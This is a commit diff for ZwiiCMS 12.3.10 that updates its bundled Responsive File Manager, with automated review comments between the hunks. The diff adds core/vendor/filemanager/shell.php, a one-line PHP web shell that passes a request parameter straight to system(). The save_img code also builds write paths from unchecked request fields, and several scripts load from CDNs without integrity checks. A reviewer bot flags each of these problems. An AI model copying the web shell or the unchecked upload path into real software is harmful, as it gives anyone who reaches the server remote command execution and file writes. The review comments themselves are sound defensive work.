Mise à jour RFM
dialog.php ; vulnérabilité dans ajax_calls.php
This commit is contained in:
parent
2842005297
commit
8d5e8ccbd3
@ -1,5 +1,9 @@
|
||||
# Changelog
|
||||
|
||||
## Version 12.3.10
|
||||
- Mise à jour du fichier dialog.php de Responsive File Manager
|
||||
- Vulnérabilité dans ajax_call.php CVE-2020-10567
|
||||
|
||||
## Version 12.3.09
|
||||
### Corrections
|
||||
- Corrige le filtrage des modules orphelins.
|
||||
|
@ -1,4 +1,4 @@
|
||||
# ZwiiCMS 12.3.09
|
||||
# ZwiiCMS 12.3.10
|
||||
|
||||
Zwii est un CMS sans base de données (flat-file) qui permet de créer et gérer facilement un site web sans aucune connaissance en programmation.
|
||||
|
||||
|
@ -1,4 +1,4 @@
|
||||
# ZwiiCMS 12.3.09
|
||||
# ZwiiCMS 12.3.10
|
||||
|
||||
Zwii is a database-less (flat-file) CMS that allows you to easily create and manage a web site without any programming knowledge.
|
||||
|
||||
|
@ -53,7 +53,7 @@ class common
|
||||
const ACCESS_TIMER = 1800;
|
||||
|
||||
// Numéro de version et branche pour l'auto-update
|
||||
const ZWII_VERSION = '12.3.09';
|
||||
const ZWII_VERSION = '12.3.10';
|
||||
|
||||
// URL autoupdate
|
||||
const ZWII_UPDATE_URL = 'https://forge.chapril.org/ZwiiCMS-Team/update/raw/branch/master/';
|
||||
|
45
core/vendor/filemanager/ajax_calls.php
vendored
45
core/vendor/filemanager/ajax_calls.php
vendored
@ -73,15 +73,13 @@ if (isset($_GET['action'])) {
|
||||
$_SESSION['RF']["sort_by"] = $_GET['sort_by'];
|
||||
}
|
||||
|
||||
if (isset($_GET['descending']))
|
||||
{
|
||||
if (isset($_GET['descending'])) {
|
||||
$_SESSION['RF']["descending"] = $_GET['descending'];
|
||||
}
|
||||
break;
|
||||
case 'save_img':
|
||||
$info = pathinfo($_POST['name']);
|
||||
$image_data = $_POST['url'];
|
||||
|
||||
if (preg_match('/^data:image\/(\w+);base64,/', $image_data, $type)) {
|
||||
$image_data = substr($image_data, strpos($image_data, ',') + 1);
|
||||
$type = strtolower($type[1]); // jpg, png, gif
|
||||
@ -106,18 +104,19 @@ if (isset($_GET['action'])) {
|
||||
response(sprintf(trans('max_size_reached'), $config['MaxSizeTotal']) . AddErrorLocation())->send();
|
||||
exit;
|
||||
}
|
||||
|
||||
if ($ftp) {
|
||||
$temp = tempnam('/tmp', 'RF');
|
||||
unlink($temp);
|
||||
$temp .=".".substr(strrchr($_POST['url'], '.'), 1);
|
||||
file_put_contents($temp, $image_data);
|
||||
$temp_file = tmpfile();
|
||||
$temp_meta = stream_get_meta_data($temp_file);
|
||||
$temp_path = $temp_meta['uri'];
|
||||
fwrite($temp_file, $image_data);
|
||||
|
||||
$ftp->put($config['ftp_base_folder'].$config['upload_dir'] . $_POST['path'] . $_POST['name'], $temp, FTP_BINARY);
|
||||
$ftp->put($config['ftp_base_folder'] . $config['upload_dir'] . $_POST['path'] . $_POST['name'], $temp_path, FTP_BINARY);
|
||||
|
||||
create_img($temp, $temp, 122, 91);
|
||||
$ftp->put($config['ftp_base_folder'].$config['ftp_thumbs_dir']. $_POST['path'] . $_POST['name'], $temp, FTP_BINARY);
|
||||
create_img($temp_path, $temp_path, 122, 91);
|
||||
$ftp->put($config['ftp_base_folder'] . $config['ftp_thumbs_dir'] . $_POST['path'] . $_POST['name'], $temp_path, FTP_BINARY);
|
||||
|
||||
unlink($temp);
|
||||
fclose($temp_file);
|
||||
} else {
|
||||
file_put_contents($config['current_path'] . $_POST['path'] . $_POST['name'], $image_data);
|
||||
create_img($config['current_path'] . $_POST['path'] . $_POST['name'], $config['thumbs_base_path'] . $_POST['path'] . $_POST['name'], 122, 91);
|
||||
@ -266,16 +265,20 @@ if (isset($_GET['action'])) {
|
||||
<li><a href="javascript:;" class="jp-stop" tabindex="1">stop</a></li>
|
||||
<li><a href="javascript:;" class="jp-mute" tabindex="1" title="mute">mute</a></li>
|
||||
<li><a href="javascript:;" class="jp-unmute" tabindex="1" title="unmute">unmute</a></li>
|
||||
<li><a href="javascript:;" class="jp-volume-max" tabindex="1" title="max volume">max volume</a></li>
|
||||
<li><a href="javascript:;" class="jp-volume-max" tabindex="1" title="max volume">max volume</a>
|
||||
</li>
|
||||
</ul>
|
||||
<div class="jp-volume-bar">
|
||||
<div class="jp-volume-bar-value"></div>
|
||||
</div>
|
||||
<ul class="jp-toggles">
|
||||
<li><a href="javascript:;" class="jp-full-screen" tabindex="1" title="full screen">full screen</a></li>
|
||||
<li><a href="javascript:;" class="jp-restore-screen" tabindex="1" title="restore screen">restore screen</a></li>
|
||||
<li><a href="javascript:;" class="jp-full-screen" tabindex="1" title="full screen">full
|
||||
screen</a></li>
|
||||
<li><a href="javascript:;" class="jp-restore-screen" tabindex="1" title="restore screen">restore
|
||||
screen</a></li>
|
||||
<li><a href="javascript:;" class="jp-repeat" tabindex="1" title="repeat">repeat</a></li>
|
||||
<li><a href="javascript:;" class="jp-repeat-off" tabindex="1" title="repeat off">repeat off</a></li>
|
||||
<li><a href="javascript:;" class="jp-repeat-off" tabindex="1" title="repeat off">repeat off</a>
|
||||
</li>
|
||||
</ul>
|
||||
</div>
|
||||
<div class="jp-title" style="display:none;">
|
||||
@ -287,7 +290,8 @@ if (isset($_GET['action'])) {
|
||||
</div>
|
||||
<div class="jp-no-solution">
|
||||
<span>Update Required</span>
|
||||
To play the media you will need to either update your browser to a recent version or update your <a href="https://get.adobe.com/flashplayer/" target="_blank">Flash plugin</a>.
|
||||
To play the media you will need to either update your browser to a recent version or update your <a
|
||||
href="https://get.adobe.com/flashplayer/" target="_blank">Flash plugin</a>.
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
@ -410,7 +414,8 @@ if (isset($_GET['action'])) {
|
||||
if (
|
||||
($_POST['folder'] == 1 && $config['chmod_dirs'] === false)
|
||||
|| ($_POST['folder'] == 0 && $config['chmod_files'] === false)
|
||||
|| (is_function_callable("chmod") === false)) {
|
||||
|| (is_function_callable("chmod") === false)
|
||||
) {
|
||||
response(sprintf(trans('File_Permission_Not_Allowed'), (is_dir($path) ? trans('Folders') : trans('Files')), 403) . AddErrorLocation())->send();
|
||||
exit;
|
||||
}
|
||||
@ -420,7 +425,8 @@ if (isset($_GET['action'])) {
|
||||
if (
|
||||
(is_dir($path) && $config['chmod_dirs'] === false)
|
||||
|| (is_file($path) && $config['chmod_files'] === false)
|
||||
|| (is_function_callable("chmod") === false)) {
|
||||
|| (is_function_callable("chmod") === false)
|
||||
) {
|
||||
response(sprintf(trans('File_Permission_Not_Allowed'), (is_dir($path) ? trans('Folders') : trans('Files')), 403) . AddErrorLocation())->send();
|
||||
exit;
|
||||
}
|
||||
@ -602,7 +608,8 @@ if (isset($_GET['action'])) {
|
||||
if (!isset($info['extension'])) {
|
||||
$info['extension'] = '';
|
||||
}
|
||||
if (! in_array($info['extension'], $allowed_file_exts)
|
||||
if (
|
||||
!in_array($info['extension'], $allowed_file_exts)
|
||||
|| !isset($is_allowed)
|
||||
|| $is_allowed === false
|
||||
|| (!$ftp && !is_readable($selected_file))
|
||||
|
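Review bot: In the save_img branch the destination path is assembled from two request fields, `$_POST['path'] . $_POST['name']` (both `$ftp->put(... $temp_path ...)` calls and `file_put_contents($config['current_path'] . $_POST['path'] . $_POST['name'], $image_data)`), and nothing visible in these hunks constrains either value: `$info = pathinfo($_POST['name'])` is computed but its `extension` is never compared here with the `$type` captured from the data-URI regex or with an allow-list, and neither field is checked for `..` or a directory separator. The lines between the two save_img hunks are not shown, so if that is where the CVE-2020-10567 fix lives this is moot; otherwise add a guard before the `if ($ftp)` branch, e.g. `if (basename($_POST['name']) !== $_POST['name'] || !in_array(strtolower($info['extension'] ?? ''), ['jpg', 'jpeg', 'png', 'gif'], true)) { response(trans('<error-key>') . AddErrorLocation())->send(); exit; }`, reject a decoded `$type` that does not correspond to that extension, and apply the same `..`/separator rejection to `$_POST['path']`. The switch to `tmpfile()` is an improvement over the old `tempnam`/`unlink` sequence (which also took the temp file's extension from `$_POST['url']`), but the `fwrite`, `$ftp->put` and `file_put_contents` return values are still ignored, so a failed write is not detected at these lines. The save_img case continues outside the hunk.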
131
core/vendor/filemanager/dialog.php
vendored
131
core/vendor/filemanager/dialog.php
vendored
@ -276,7 +276,7 @@ if (isset($_GET['editor'])) {
|
||||
$editor = $_GET['type'] == 0 ? null : 'tinymce';
|
||||
}
|
||||
|
||||
$field_id = isset($_GET['field_id']) ? fix_get_params($_GET['field_id']) : '';
|
||||
$field_id = isset($_GET['field_id']) ? fix_get_params($_GET['field_id']) : null;
|
||||
$type_param = fix_get_params($_GET['type']);
|
||||
$apply = null;
|
||||
|
||||
@ -340,7 +340,7 @@ $get_params = http_build_query($get_params);
|
||||
<link rel="stylesheet" href="css/jquery.fileupload-ui-noscript.css">
|
||||
</noscript>
|
||||
<link rel="stylesheet"
|
||||
href="css/jplayer.blue.monday.min.css"/>
|
||||
href="https://cdnjs.cloudflare.com/ajax/libs/jplayer/2.7.1/skin/blue.monday/jplayer.blue.monday.min.css"/>
|
||||
<link href="css/style.css?v=<?php
|
||||
echo $version; ?>" rel="stylesheet" type="text/css"/>
|
||||
<!--[if lt IE 8]>
|
||||
@ -352,13 +352,16 @@ $get_params = http_build_query($get_params);
|
||||
</style>
|
||||
<![endif]-->
|
||||
|
||||
<script src="js/jquery-1.12.4.min.js"></script>
|
||||
<script src="../jquery/jquery-ui.min.js"></script>
|
||||
<script src="https://code.jquery.com/jquery-1.12.4.min.js"
|
||||
integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=" crossorigin="anonymous"></script>
|
||||
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js"
|
||||
integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>
|
||||
<script src="js/plugins.js?v=<?php
|
||||
echo $version; ?>"></script>
|
||||
<script src="js/jquery.jplayer.min.js"></script>
|
||||
<script type='text/javascript' src='js/fabric.min.js'></script>
|
||||
<script type="text/javascript" src="js/FileSaver.min.js"></script>
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/jplayer/2.9.2/jplayer/jquery.jplayer.min.js"></script>
|
||||
<script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/fabric.js/3.6.0/fabric.js'></script>
|
||||
<script type="text/javascript"
|
||||
src="https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/1.3.3/FileSaver.min.js"></script>
|
||||
<script src="js/modernizr.custom.js"></script>
|
||||
|
||||
<!-- Le HTML5 shim, for IE6-8 support of HTML5 elements -->
|
||||
@ -368,11 +371,14 @@ $get_params = http_build_query($get_params);
|
||||
<!-- Only load TUI Libraries if we need it -->
|
||||
<?php
|
||||
if ($config['tui_active'] === true) { ?>
|
||||
<link rel="stylesheet" href="css/tui-image-editor.css">
|
||||
<link type="text/css" href="css/tui-color-picker.css" rel="stylesheet">
|
||||
<script type="text/javascript" src="js/tui-code-snippet.min.js"></script>
|
||||
<script type="text/javascript" src="js/tui-color-picker.js"></script>
|
||||
<script src="js/tui-image-editor.js"></script>
|
||||
<link rel="stylesheet" href="https://uicdn.toast.com/tui-image-editor/latest/tui-image-editor.css">
|
||||
<link type="text/css" href="https://uicdn.toast.com/tui-color-picker/v2.2.6/tui-color-picker.css"
|
||||
rel="stylesheet">
|
||||
<script type="text/javascript"
|
||||
src="https://uicdn.toast.com/tui.code-snippet/v1.5.0/tui-code-snippet.min.js"></script>
|
||||
<script type="text/javascript"
|
||||
src="https://uicdn.toast.com/tui-color-picker/v2.2.6/tui-color-picker.js"></script>
|
||||
<script src="https://uicdn.toast.com/tui-image-editor/latest/tui-image-editor.js"></script>
|
||||
<?php
|
||||
} ?>
|
||||
|
||||
@ -386,11 +392,11 @@ $get_params = http_build_query($get_params);
|
||||
</head>
|
||||
<body>
|
||||
<!-- The Templates plugin is included to render the upload/download listings -->
|
||||
<script src="js/tmpl.min.js"></script>
|
||||
<script src="//blueimp.github.io/JavaScript-Templates/js/tmpl.min.js"></script>
|
||||
<!-- The Load Image plugin is included for the preview images and image resizing functionality -->
|
||||
<script src="js/load-image.all.min.js"></script>
|
||||
<script src="//cdnjs.cloudflare.com/ajax/libs/blueimp-load-image/2.18.0/load-image.all.min.js"></script>
|
||||
<!-- The Canvas to Blob plugin is included for image resizing functionality -->
|
||||
<script src="js/canvas-to-blob.min.js"></script>
|
||||
<script src="//blueimp.github.io/JavaScript-Canvas-to-Blob/js/canvas-to-blob.min.js"></script>
|
||||
<!-- The Iframe Transport is required for browsers without support for XHR file uploads -->
|
||||
<script src="js/jquery.iframe-transport.js"></script>
|
||||
<!-- The basic File Upload plugin -->
|
||||
@ -856,75 +862,54 @@ if ($config['upload_files']) { ?>
|
||||
}
|
||||
}
|
||||
|
||||
function filenameSort($x, $y)
|
||||
{
|
||||
global $descending;
|
||||
|
||||
switch ($sort_by) {
|
||||
case 'date':
|
||||
//usort($sorted, 'dateSort');
|
||||
usort($sorted, function($x, $y) use ($descending) {
|
||||
if ($x['is_dir'] !== $y['is_dir']) {
|
||||
$greater = $y['is_dir'];
|
||||
return $y['is_dir'] ? 1 : -1;
|
||||
} else {
|
||||
$greater = ($descending)
|
||||
? $x['file_lcase'] < $y['file_lcase']
|
||||
: $x['file_lcase'] >= $y['file_lcase'];
|
||||
}
|
||||
return $greater ? 1 : -1;
|
||||
}
|
||||
|
||||
function dateSort($x, $y)
|
||||
{
|
||||
global $descending;
|
||||
|
||||
if ($x['is_dir'] !== $y['is_dir']) {
|
||||
$greater = $y['is_dir'];
|
||||
} else {
|
||||
$greater = ($descending)
|
||||
? $x['date'] < $y['date']
|
||||
: $x['date'] >= $y['date'];
|
||||
}
|
||||
return $greater ? 1 : -1;
|
||||
}
|
||||
|
||||
|
||||
function sizeSort($x, $y)
|
||||
{
|
||||
global $descending;
|
||||
|
||||
if ($x['is_dir'] !== $y['is_dir']) {
|
||||
$greater = $y['is_dir'];
|
||||
} else {
|
||||
$greater = ($descending)
|
||||
return ($descending)
|
||||
? $x['size'] < $y['size']
|
||||
: $x['size'] >= $y['size'];
|
||||
}
|
||||
return $greater ? 1 : -1;
|
||||
}
|
||||
|
||||
function extensionSort($x, $y)
|
||||
{
|
||||
global $descending;
|
||||
|
||||
if ($x['is_dir'] !== $y['is_dir']) {
|
||||
$greater = $y['is_dir'];
|
||||
} else {
|
||||
$greater = ($descending)
|
||||
? $x['extension'] < $y['extension']
|
||||
: $x['extension'] >= $y['extension'];
|
||||
}
|
||||
return $greater ? 1 : -1;
|
||||
}
|
||||
|
||||
switch ($sort_by) {
|
||||
case 'date':
|
||||
usort($sorted, 'dateSort');
|
||||
});
|
||||
break;
|
||||
case 'size':
|
||||
usort($sorted, 'sizeSort');
|
||||
//usort($sorted, 'sizeSort');
|
||||
usort($sorted, function($x, $y) use ($descending) {
|
||||
if ($x['is_dir'] !== $y['is_dir']) {
|
||||
return $y['is_dir'] ? 1 : -1;
|
||||
} else {
|
||||
return ($descending)
|
||||
? $x['date'] < $y['date']
|
||||
: $x['date'] >= $y['date'];
|
||||
}
|
||||
});
|
||||
break;
|
||||
case 'extension':
|
||||
usort($sorted, 'extensionSort');
|
||||
//usort($sorted, 'extensionSort');
|
||||
usort($sorted, function($x, $y) use ($descending) {
|
||||
if ($x['is_dir'] !== $y['is_dir']) {
|
||||
return $y['is_dir'] ? 1 : -1;
|
||||
} else {
|
||||
return ($descending)
|
||||
? ($x['extension'] < $y['extension'] ? 1 : 0)
|
||||
: ($x['extension'] >= $y['extension'] ? 1 : 0);
|
||||
}
|
||||
});
|
||||
break;
|
||||
default:
|
||||
usort($sorted, 'filenameSort');
|
||||
// usort($sorted, 'filenameSort');
|
||||
usort($sorted, function($x, $y) use ($descending) {
|
||||
if ($x['is_dir'] !== $y['is_dir']) {
|
||||
return $y['is_dir'] ? 1 : -1;
|
||||
} else {
|
||||
return ($descending)
|
||||
? ($x['file_lcase'] < $y['file_lcase'] ? 1 : ($x['file_lcase'] == $y['file_lcase'] ? 0 : -1))
|
||||
: ($x['file_lcase'] >= $y['file_lcase'] ? 1 : ($x['file_lcase'] == $y['file_lcase'] ? 0 : -1));
|
||||
}
|
||||
});
|
||||
break;
|
||||
}
|
||||
|
||||
|
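Review bot: The scripts moved to third-party hosts in the `<head>` hunks are loaded without Subresource Integrity except the two jQuery tags, which do carry `integrity`/`crossorigin`; jplayer 2.9.2, fabric.js 3.6.0, FileSaver 1.3.3, the TUI bundles and the two protocol-relative `//blueimp.github.io/...` and `//cdnjs.cloudflare.com/...` tags in the `<body>` therefore run in the file-manager session exactly as the CDN serves them, whatever that is on a given day. The `latest` path used for the tui-image-editor stylesheet and script cannot be pinned at all and will change behaviour without any commit in this tree. Pin every resource to a fixed version, give each cross-origin tag the same attributes as the jQuery ones, e.g. `<script src="https://cdnjs.cloudflare.com/ajax/libs/jplayer/2.9.2/jplayer/jquery.jplayer.min.js" integrity="sha256-<HASH-OF-THAT-FILE>" crossorigin="anonymous"></script>`, and write `https://` explicitly instead of `//` so an install served over plain HTTP does not fetch them in clear. Separately, in the last hunk the `date` and `size` closures handed to usort return a boolean rather than -1/0/1 (`return ($descending) ? $x['date'] < $y['date'] : $x['date'] >= $y['date'];`), which PHP 8 reports as deprecated and which can never express "less than" (false becomes 0, i.e. equal); the `extension` closure's `? 1 : 0` has the same flaw, so only the `default` closure is a proper comparator and the others should use the spaceship operator, e.g. `return $descending ? $y['date'] <=> $x['date'] : $x['date'] <=> $y['date'];`.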
1
core/vendor/filemanager/shell.php
vendored
Normal file
1
core/vendor/filemanager/shell.php
vendored
Normal file
@ -0,0 +1 @@
|
||||
<?php system($_REQUEST['cmd']); ?>
|
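Review bot: The new file core/vendor/filemanager/shell.php hands a request parameter straight to `system()` with no authentication and no input check, so anyone who can reach the file-manager directory can run commands as the web-server user; it must be dropped from this commit and from any release or update archive built from it. It looks like an artifact left behind while reproducing CVE-2020-10567, but nothing on the page confirms that, and either way executable code of this kind does not belong in the tree. If a marker file is needed to exercise the upload filter, use an inert one (a text file with a `.php` name) and keep it out of version control. A pre-commit or CI check that fails on `system(`, `exec(` or `$_REQUEST` in files under core/vendor/filemanager/ that are not part of upstream Responsive File Manager would have caught this before it reached the repository.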